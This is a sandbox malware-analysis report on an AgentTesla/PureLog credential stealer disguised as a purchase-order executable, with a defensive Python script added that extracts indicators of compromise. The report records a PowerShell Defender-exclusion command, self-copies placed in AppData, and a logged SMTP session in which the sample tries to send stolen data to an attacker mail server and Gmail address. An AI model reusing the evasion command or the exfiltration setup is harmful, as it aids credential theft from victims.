                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                      .text | 0x2000 | 0x1065ac | 0x106600 | 469eb944f9880a0a80102c8cfb43cb35 | False | 0.9282117228442115 | data | 7.918254359877085 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rsrc | 0x10a000 | 0x1c30 | 0x1e00 | bff48e38bf674e59590a677aee410a6f | False | 0.283984375 | data | 4.495542070491739 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc | 0x10c000 | 0xc | 0x200 | c9f79b5cbd7e56e1ef161c61dbb70947 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                      RT_ICON | 0x10a160 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.3953900709219858
                                      RT_ICON | 0x10a5c8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.21693245778611633
                                      RT_GROUP_ICON | 0x10b670 | 0x22 | data | | | 0.9411764705882353
                                      RT_VERSION | 0x10b694 | 0x3b0 | data | | | 0.4173728813559322
                                      RT_MANIFEST | 0x10ba44 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                      DLL | Import
                                      mscoree.dll | _CorExeMain
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Sep 27, 2024 10:44:36.929817915 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:36.934813976 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:36.934961081 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:37.564563990 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:37.573321104 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:37.578244925 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:37.806689024 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:37.861216068 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:38.558726072 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:38.563733101 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:38.796312094 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:38.796797991 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:38.801667929 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:39.026072979 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:39.026376963 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:39.031332016 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.264386892 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.264745951 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:42.269769907 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.496138096 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.496898890 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:42.501799107 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.729871035 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.785073042 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:42.801044941 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Sep 27, 2024 10:44:42.806248903 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4
                                      Sep 27, 2024 10:44:42.807615042 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Sep 27, 2024 10:43:22.321254969 CEST | 53 | 52905 | 1.1.1.1 | 192.168.2.4
                                      Sep 27, 2024 10:43:36.915010929 CEST | 53 | 65436 | 162.159.36.2 | 192.168.2.4
                                      Sep 27, 2024 10:43:37.414424896 CEST | 54348 | 53 | 192.168.2.4 | 1.1.1.1
                                      Sep 27, 2024 10:43:37.422732115 CEST | 53 | 54348 | 1.1.1.1 | 192.168.2.4
                                      Sep 27, 2024 10:43:38.765053988 CEST | 64500 | 53 | 192.168.2.4 | 1.1.1.1
                                      Sep 27, 2024 10:43:38.772284031 CEST | 53 | 64500 | 1.1.1.1 | 192.168.2.4
                                      Sep 27, 2024 10:44:36.796443939 CEST | 62012 | 53 | 192.168.2.4 | 1.1.1.1
                                      Sep 27, 2024 10:44:36.911628008 CEST | 53 | 62012 | 1.1.1.1 | 192.168.2.4
                                      Sep 27, 2024 10:44:38.048201084 CEST | 54948 | 53 | 192.168.2.4 | 1.1.1.1
                                      Sep 27, 2024 10:44:38.490972996 CEST | 53 | 54948 | 1.1.1.1 | 192.168.2.4
                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                      Sep 27, 2024 10:43:37.414424896 CEST | 192.168.2.4 | 1.1.1.1 | 0x93cc | Standard query (0) | 241.42.69.40.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                      Sep 27, 2024 10:43:38.765053988 CEST | 192.168.2.4 | 1.1.1.1 | 0xd55d | Standard query (0) | 26.165.165.52.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                      Sep 27, 2024 10:44:36.796443939 CEST | 192.168.2.4 | 1.1.1.1 | 0xa214 | Standard query (0) | mail.yildiztepeenerji.com.tr | A (IP address) | IN (0x0001) | false
                                      Sep 27, 2024 10:44:38.048201084 CEST | 192.168.2.4 | 1.1.1.1 | 0x9dc8 | Standard query (0) | _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr | 33 | IN (0x0001) | false
                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                      Sep 27, 2024 10:43:37.422732115 CEST | 1.1.1.1 | 192.168.2.4 | 0x93cc | Name error (3) | 241.42.69.40.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                      Sep 27, 2024 10:43:38.772284031 CEST | 1.1.1.1 | 192.168.2.4 | 0xd55d | Name error (3) | 26.165.165.52.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                      Sep 27, 2024 10:44:36.911628008 CEST | 1.1.1.1 | 192.168.2.4 | 0xa214 | No error (0) | mail.yildiztepeenerji.com.tr | | 77.245.148.65 | A (IP address) | IN (0x0001) | false
                                      Sep 27, 2024 10:44:38.490972996 CEST | 1.1.1.1 | 192.168.2.4 | 0x9dc8 | Name error (3) | _kerberos._tcp.dc._msdcs.yildiztepeenerji.com.tr | none | none | 33 | IN (0x0001) | false
                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                      Sep 27, 2024 10:44:37.564563990 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 220 mail05.trdns.com ESMTP IceWarp 11.3.1.5 x64; Fri, 27 Sep 2024 11:44:36 +0300
                                      Sep 27, 2024 10:44:37.573321104 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65 | EHLO 506407
                                      Sep 27, 2024 10:44:37.806689024 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 250-mail05.trdns.com Hello 506407 [8.46.123.33], pleased to meet you.
                                      250-ENHANCEDSTATUSCODES
                                      250-SIZE
                                      250-EXPN
                                      250-ETRN
                                      250-ATRN
                                      250-DSN
                                      250-CHECKPOINT
                                      250-8BITMIME
                                      250-AUTH PLAIN LOGIN DIGEST-MD5 CRAM-MD5 GSSAPI
                                      250-STARTTLS
                                      250-VRFY
                                      250 HELP
                                      Sep 27, 2024 10:44:38.558726072 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65 | AUTH gssapi TlRMTVNTUAABAAAAl4II4gAAAAAAAAAAAAAAAAAAAAAKAGFKAAAADw==
                                      Sep 27, 2024 10:44:38.796312094 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 535 5.7.8 Authentication credentials invalid
                                      Sep 27, 2024 10:44:38.796797991 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65 | AUTH login bXVoYXNlYmVAeWlsZGl6dGVwZWVuZXJqaS5jb20udHI=
                                      Sep 27, 2024 10:44:39.026072979 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                      Sep 27, 2024 10:44:42.264386892 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 535 5.7.8 Authentication credentials invalid
                                      Sep 27, 2024 10:44:42.264745951 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65 | MAIL FROM:<muhasebe@yildiztepeenerji.com.tr>
                                      Sep 27, 2024 10:44:42.496138096 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 250 2.1.0 <muhasebe@yildiztepeenerji.com.tr>... Sender ok
                                      Sep 27, 2024 10:44:42.496898890 CEST | 50358 | 587 | 192.168.2.4 | 77.245.148.65 | RCPT TO:<obikachikezienelson19@gmail.com>
                                      Sep 27, 2024 10:44:42.729871035 CEST | 587 | 50358 | 77.245.148.65 | 192.168.2.4 | 550 5.7.1 <muhasebe@yildiztepeenerji.com.tr> Access to <obikachikezienelson19@gmail.com> not allowed

                                      Target ID:0
                                      Start time:04:43:02
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x930000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1760927897.00000000053C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1756670007.0000000003E37000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1755288317.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x860000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x220000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:4
                                      Start time:04:43:03
                                      Start date:27/09/2024
                                      Path:C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.,LTD 2024.exe"
                                      Imagebase:0x770000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4186061604.0000000002B31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

                                      Target ID:5
                                      Start time:04:43:13
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x8f0000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877432434.0000000003D43000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000002.1867946503.0000000002CA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.1877432434.0000000003CC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 71%, ReversingLabs
                                      Reputation:low
                                      Has exited:true

                                      Target ID:6
                                      Start time:04:43:14
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x470000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.1928113926.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.1935883302.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:9
                                      Start time:04:43:20
                                      Start date:27/09/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:04:43:21
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x590000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.1963628997.0000000003A28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:11
                                      Start time:04:43:22
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0x360000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:12
                                      Start time:04:43:22
                                      Start date:27/09/2024
                                      Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                      Imagebase:0xe80000
                                      File size:1'083'392 bytes
                                      MD5 hash:0362B41458CD2B19F542E3F3F040C547
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.4184465405.000000000322B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false

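The process list above shows the same 1'083'392-byte binary, with the submitted sample's MD5, started several times from C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe, and the last instance (Target ID 12) never exiting. The following script is an added example, not part of the Joe Sandbox report or of Joe Security's tooling: it parses the plain-text "Target ID" blocks as laid out on this page, then reports which processes are byte-identical self-copies of the sample running from a user profile directory and which of them were still alive at the end of the analysis. The embedded input is a transcription of three of the blocks above (Targets 6, 9 and 12) with a subset of their fields; the `SAMPLE_MD5` constant is the MD5 from the report header.

```python
"""Triage helper for Joe Sandbox "Target ID" process blocks (added example,
not from the report).  Parses the key:value lines, then flags self-copies of
the submitted sample: same MD5 as the sample, path under \\AppData\\."""
import re
from dataclasses import dataclass

# Constructed input: Target IDs 6, 9 and 12 transcribed from the report above.
REPORT_TEXT = """
Target ID:6
Start time:04:43:14
Path:C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe
Wow64 process (32bit):true
Commandline:"C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe"
File size:1'083'392 bytes
MD5 hash:0362B41458CD2B19F542E3F3F040C547
Has administrator privileges:false
Reputation:low
Has exited:true

Target ID:9
Start time:04:43:20
Path:C:\\Windows\\System32\\conhost.exe
Wow64 process (32bit):false
Commandline:C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has administrator privileges:false
Reputation:high
Has exited:true

Target ID:12
Start time:04:43:22
Path:C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe
Wow64 process (32bit):true
Commandline:"C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe"
File size:1'083'392 bytes
MD5 hash:0362B41458CD2B19F542E3F3F040C547
Has administrator privileges:false
Reputation:low
Has exited:false
"""

SAMPLE_MD5 = "0362b41458cd2b19f542e3f3f040c547"  # MD5 from the report header


@dataclass
class Proc:
    target_id: int
    path: str
    md5: str
    size: int
    wow64: bool
    exited: bool


def parse_targets(text):
    """Split on blank lines; each block is 'Key:Value' lines.  partition() on the
    first colon keeps values such as '04:43:14' and 'C:\\...' intact."""
    procs = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, _, val = line.partition(":")
            fields[key.strip()] = val.strip()
        if "Target ID" not in fields:
            continue
        procs.append(Proc(
            target_id=int(fields["Target ID"]),
            path=fields["Path"],
            md5=fields["MD5 hash"].lower(),
            # "1'083'392 bytes" -> 1083392
            size=int(fields["File size"].split()[0].replace("'", "")),
            wow64=fields["Wow64 process (32bit)"] == "true",
            exited=fields["Has exited"] == "true",
        ))
    return procs


def self_copies(procs, sample_md5):
    """Processes byte-identical to the sample but started from a user-writable
    profile location: the persistence artefact to collect and block."""
    return [p for p in procs
            if p.md5 == sample_md5.lower() and "\\appdata\\" in p.path.lower()]


def iocs(procs, sample_md5):
    copies = self_copies(procs, sample_md5)
    return {
        "md5": sample_md5.lower(),
        "paths": sorted({p.path for p in copies}),
        "still_running": sorted(p.target_id for p in copies if not p.exited),
    }


if __name__ == "__main__":
    print(iocs(parse_targets(REPORT_TEXT), SAMPLE_MD5))
```

The `still_running` list is the part worth acting on first: a self-copy that has not exited by the end of the run is the instance that would be found resident on a victim host, and its path plus the shared MD5 are the two indicators to push to endpoint tooling.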

                                        Execution Graph

                                        Execution Coverage:7.2%
                                        Dynamic/Decrypted Code Coverage:100%
                                        Signature Coverage:0%
                                        Total number of Nodes:72
                                        Total number of Limit Nodes:6
execution_graph: [graph rendering not reproducible in text; its API-call nodes, all in the 0x1270000 dump, are DuplicateHandle, GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, CreateActCtxA and GetModuleHandleW]

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0127D216
                                        • GetCurrentThread.KERNEL32 ref: 0127D253
                                        • GetCurrentProcess.KERNEL32 ref: 0127D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0127D2E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: 20f062b5a4236725675d3aa7c846c5d0e90b82d55ba0e6c2bbcae5d7a757c5ca
                                        • Instruction ID: 79c6fde58981c3840ab12b13a969ff098544265450e2546fc9fd29ccc3651a63
                                        • Opcode Fuzzy Hash: 20f062b5a4236725675d3aa7c846c5d0e90b82d55ba0e6c2bbcae5d7a757c5ca
                                        • Instruction Fuzzy Hash: 1D5166B4D1074A8FEB09DFA9D548BAEBBF2AF88314F208459D019A7390D7349944CF65

                                        Control-flow Graph

                                        APIs
                                        • GetCurrentProcess.KERNEL32 ref: 0127D216
                                        • GetCurrentThread.KERNEL32 ref: 0127D253
                                        • GetCurrentProcess.KERNEL32 ref: 0127D290
                                        • GetCurrentThreadId.KERNEL32 ref: 0127D2E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Current$ProcessThread
                                        • String ID:
                                        • API String ID: 2063062207-0
                                        • Opcode ID: c611fbfc96bb1aca2edd596c9bf9ce8dc0d979eb9c7315ed8f2a600daea4a655
                                        • Instruction ID: 0cc66805a767107021ca87bc8697e942de1b79fa948f63d494614f4ef7b58c83
                                        • Opcode Fuzzy Hash: c611fbfc96bb1aca2edd596c9bf9ce8dc0d979eb9c7315ed8f2a600daea4a655
                                        • Instruction Fuzzy Hash: 1D5175B0D0074A8FEB05DFAAD548BDEBBF1BF88314F208459E019A7260D734A944CF65

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x127add9-0x127b068, not reproducible in text; API node: GetModuleHandleW at 0x127b020]
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0127B03E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: HandleModule
                                        • String ID:
                                        • API String ID: 4139908857-0
                                        • Opcode ID: 7575fc5baeb9d4216b928eb6db0ce7a3814c1638c06a617e4c96a6b14d2fafeb
                                        • Instruction ID: 2b8733d9cc29d1e955f6ab2573a597f4238a3b1f928ede4d3210cf72ab00d633
                                        • Opcode Fuzzy Hash: 7575fc5baeb9d4216b928eb6db0ce7a3814c1638c06a617e4c96a6b14d2fafeb
                                        • Instruction Fuzzy Hash: DB814570A10B069FE725DF29D4447ABBBF1BF88310F048A2DD18AD7A40D775E849CB91

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x12744d4-0x1275a61, not reproducible in text; API node: CreateActCtxA]
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 5941e1a09e412721137fb4607e84530e511fdc0cf512fa0aa676dfe05acf8f52
                                        • Instruction ID: 097820dd7ddfb488d6614ff5cde40ff172450c2d714e59fa2504880c152d2337
                                        • Opcode Fuzzy Hash: 5941e1a09e412721137fb4607e84530e511fdc0cf512fa0aa676dfe05acf8f52
                                        • Instruction Fuzzy Hash: D541CFB0D10719CBEB24DFAAC88478EFBB5AF49704F60806AD408AB251DB755945CF90

                                        Control-flow Graph

control_flow_graph: [executed/not-executed graph of function 0x127590d-0x1275a61, not reproducible in text; API node: CreateActCtxA]
                                        APIs
                                        • CreateActCtxA.KERNEL32(?), ref: 012759C9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1754737083.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_1270000_PR 2500006515 #U2116 972 #U043e#U0442 ETA 24 HIDMAKSAN VIETNAM IND CO.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: 555f0db15a43ae7e2f3d44934f87bb78b39d8f82d62aceea182e99119d6e7cf6
                                        • Instruction ID: 7f52631812e5ad4f3916d23d1202e4fd45003d2483307886c60a75d0a6ecb448
